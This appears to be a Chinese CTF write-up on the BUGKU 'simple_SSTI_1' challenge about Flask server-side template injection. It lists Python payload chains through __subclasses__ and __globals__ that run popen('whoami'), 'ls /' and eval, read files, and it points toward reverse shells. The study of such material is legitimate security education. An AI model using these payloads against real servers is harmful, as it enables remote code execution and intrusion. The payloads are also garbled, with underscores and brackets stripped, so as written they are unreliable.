当前位置: 首页 > news >正文

BUGKU-simple_SSTI_1漏洞注入

SSTI漏洞注入

SSTI全称Server side template injection.服务端模板注入这节课主要讲flask的模板注入.flask会把类似于 的变量当做参数来渲染并填充到web页面,如果该参数可控并被后台解析则有可能被注入恶意代码导致注入漏洞请注意 模板注入只会存在于二次渲染中,无二次渲染不会出现模板注入。

注入过程

  1. 确定模板类型
    在这里插入图片描述
  2. 利用魔术方法寻找可命令执行的子类
    魔术方法:
    class 返回类型所属的对象
    mro 返回一个包含对象所继承的基类元组,方法在解析时按照元组的顺序解析。
    base 返回该对象所继承的基类 // __base__和__mro__都是用来寻找基类的
    subclasses 每个新类都保留了子类的引用,这个方法返回一个类中仍然可用的的引用的列表
    init 类的初始化方法
    globals 对包含函数全局变量的字典的引用
    寻找子类:
    Python3:
    使用file类读取文件的方法: <class ‘_frozen_importlib_external.FileLoader’>这个类索引号;
    利用os._warp_close类的 popen函数执行命令:
    [].class.mro[-1].subclasses()[128].init.globals’popen’.read()
    ().class.bases[0].subclasses()[128].init.globals[‘builtins’]‘import’.popen(‘whoami’).read()
    ().class.bases[0].subclasses()[128].init.globals[‘builtins’]‘eval’
    ().class.bases[0].subclasses()[128].init.globals[‘builtins’]‘eval’
    利用os._warp_close类的 open函数读取文件:
    ().class.bases[0].subclasses()[128].init.globals[‘builtins’]‘open’.read()
    Python2:
    利用 warnings.WarningMessage的 linecache执行命令:
    [].class.base.subclasses()[59].init.func_globals[‘linecache’].os.popen(‘whoami’).read()
    ().class.bases[0].subclasses()40.read()
    ().class.bases[0].subclasses()[75].init.globals[‘builtins’]‘eval’
    利用file类读取文件(python2特有):
    ().class.bases[0].subclasses()40.read()
    ().class.bases[0].subclasses()40.readlines()
    存在popen函数的类一般是 os._wrap_close
    [].class.mro[-1].subclasses()[128].init.globals[‘builtins’][‘eval’](‘import(“o”+“s”).popen(“ls /”).read()’)
    思路:找到父类<type ‘object’>–>寻找子类–>找关于命令执行或者文件操作的模块。
    几个含有eval函数的类:
    warnings.catch_warnings
    WarningMessage
    codecs.IncrementalEncoder
    codecs.IncrementalDecoder
    codecs.StreamReaderWriter
    os._wrap_close
    reprlib.Repr
    weakref.finalize
  3. 构造PAYLOAD执行反弹SHELL等命令
    相关链接
http://www.lryc.cn/news/185189.html

相关文章:

  • Python:dict
  • git和svn 的国内的下载地址
  • matplotlib制图进阶版
  • 【Java 进阶篇】HTML介绍与软件架构相关知识详解
  • Python数据攻略-Pandas与机器学习数据准备
  • 阿里云/亚马逊云代理:aws账号购买:aws亚马逊云账号的优势
  • JSON的MIME媒体类型是application/json
  • C++ 之如何将数组传递给函数?
  • 1.7 计算机网络体系结构
  • boost在不同平台下的编译(win、arm)
  • 计算机网络(第8版)第一章概述笔记
  • Linux 部署项目
  • MySQL 基础
  • VR模拟鸡胚培养接种实验,打造沉浸式的学习环境
  • 基于ModbusTCP与西门子PLC通讯项目案例
  • Oralce数据库管理 -操作系统cpu 内存 io指标分析查询
  • my_print_defaults 及perror
  • 视频转GIF:快速生成有趣的动态图片
  • vue3 vscode no tsconfig与找不到名称“ref”。ts(2304)
  • Docker基本操作【一篇学会项目部署】
  • 目标识别项目实战:基于Yolov7-LPRNet的动态车牌目标识别算法模型(二)
  • Ceph入门到精通-sysctl.conf 配置
  • Cesium 展示——实体点击的相关属性,进行增删改
  • 【算法小课堂】二分查找算法
  • git修改提交历史中的author信息
  • 【gitlab】本地项目上传gitlab
  • freertos信号量之计数信号量
  • wc命令使用指南 | 教你如何高效统计文件字数、行数和字符数
  • 网络安全:发起一次CSRF攻击!
  • java上传文件到指定服务器